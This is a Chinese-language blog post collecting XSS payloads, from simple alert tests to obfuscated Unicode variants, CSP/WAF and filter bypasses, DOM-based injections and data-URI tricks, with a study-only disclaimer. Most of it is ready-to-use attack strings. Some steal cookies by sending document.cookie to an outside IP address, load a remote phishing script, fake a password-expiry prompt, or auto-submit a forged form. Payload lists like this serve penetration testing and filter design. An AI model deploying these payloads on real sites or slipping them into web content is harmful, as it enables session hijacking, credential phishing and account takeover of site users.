关于XSS的一些奇怪pyload
本文仅供学习探讨,切勿用于非法行为。
大型站点测试为了防止影响业务最好不要弹窗,使用console.log输出
XSS弹窗
<script>alert(/xss/)</script>
<script>confirm('xss')</script>
<script>prompt('xss')</script>
document.write('<script>alert("xss")<\/script>')
<svg onload=alert(1)>
<img src=x onerror = alert(666); >
<img src=# onerror=alert(1)>
XSS利用
<img src=x onerror = document.body.appendChild(document.createElement('img')).setAttribute('src','http://172.16.11.2:8888/?='+document.cookie); >
<img src=" http://192.168.50.100/pkxss/xfish/fish.php" />
<script src=" http://192.168.50.100/pkxss/xfish/fish.php">
<script>window.location.href="http://www.baidu.com";</script>
奇奇怪怪的xss
<script>क='',ख=!क+क,ग=!ख+क,घ=क+{},ङ=ख
[क++],च=ख[छ=क],ज=++छ+क,झ=घ[छ+ज
],ख[झ+=घ[क]+(ख.ग+घ)[क]+ग[ज]+ङ+
च+ख[छ]+झ+ङ+घ[क]+च][झ](ग[क]+ग[
छ]+ख[ज]+च+ङ+'`एक्स०एस०एस`')``</script>>
<svg onload='new Function`["Jaky"].find(al\u0065rt)`'>
<svg onload=alert(1)></svg>
<ScriPt>ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()</sCripT>
<script>javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>>
<script>𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+"(𐂃)")()</script>>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>Jaky</a>
<script>alert?.(document?.cookie)</script>
无script的xss
<img/src=# onerror=alert('XSS')>
<video> <source onerror=”javascript:alert(1)”>
引入媒体类测试代码Example:
<video onerror=”javascript:alert(1)”><source>
<audio onerror=”javascript:alert(1)”><source>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
表单点击测试代码Example:
<button form=test onformchange=alert(2)>X
<form><button formaction=”javascript:alert(1)”>
ByPass
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<base href="javascript:\"> <a href="//%0aalert(/1/);//">link</a>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
CSP & WAF Bypass
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
<svg </onload ="1> (_=alert,_(1337)) "">
<img onerror=alert(1) src <u></u>
重定向 测试代码
';redirecturl='javascript:alert("XSS")
';redirecturl='http://google.com/'
Example: www.xyz.com?q="XSS Script"
"/>alert("Xss:Priyanshu")
"/></script><script>alert(/XSS : Priyanshu/)</script>
<body onload=alert(1)>
"<body onload="alert('XSS by Priyanshu')">
"><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript>
<body onload=document.getElementById("xsrf").submit()>
<a href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(1)>">X</a
<a href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(document.cookie)>">X</a
http://test.com<script>alert(document.domain)</script>
http://test.com<script>alert(document.cookie)</script>
<img src=x onerror=alert(document.domain)>
x"></script><img src=x onerror=alert(1)>
q=" onclick="alert(/XSS/)
"><iframe src='javascript:prompt(/XSS/);'>
<iframe src="http://google.com"></iframe>
"><iframe src=a onload=alert('XSS')<
</script><script>alert(document.cookie)</script>
<xss>alert('xss')</xss>
<iframe src="http://google.com"></iframe>
DOM Based XSS Scripts
/default.aspx#"><img src=x onerror=prompt('XSS');>
/default.aspx#"><img src=x onerror=prompt('0');>
<img src=x onerror=prompt(1);> by ">
“><img src=x onerror=prompt(0)>.txt.jpg
“><img src=x onerror=alert(document.cookie)>
"><img src=x onerror=prompt(1);>
"><script>alert('XSS')</script>
id=abc"><Script>alert(/xss/)</SCRIPT>
"><img src=" " onMouseover=prompt(/xss/);>
Default.aspx/" onmouseout="confirm(1)'x="
css样式xss
"><style>
@keyframes
x{}</style><xss style="animation-name:x" onanimationend="[].map(alert('xss'))"></xss>>
<b/style=position:fixed;top:0;left:0;font-size:200px>CSS<
欺骗会话
http://localhost/test.php?title=TITLE</title><script>var a = prompt('密码已经过期,请重新输入密码');alert(a);</script>
data数据流绕过滤
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 清华大学推出第四讲使用 DeepSeek + DeepResearch 让科研像聊天一样简单!
· 推荐几款开源且免费的 .NET MAUI 组件库
· 实操Deepseek接入个人知识库
· 易语言 —— 开山篇
· Trae初体验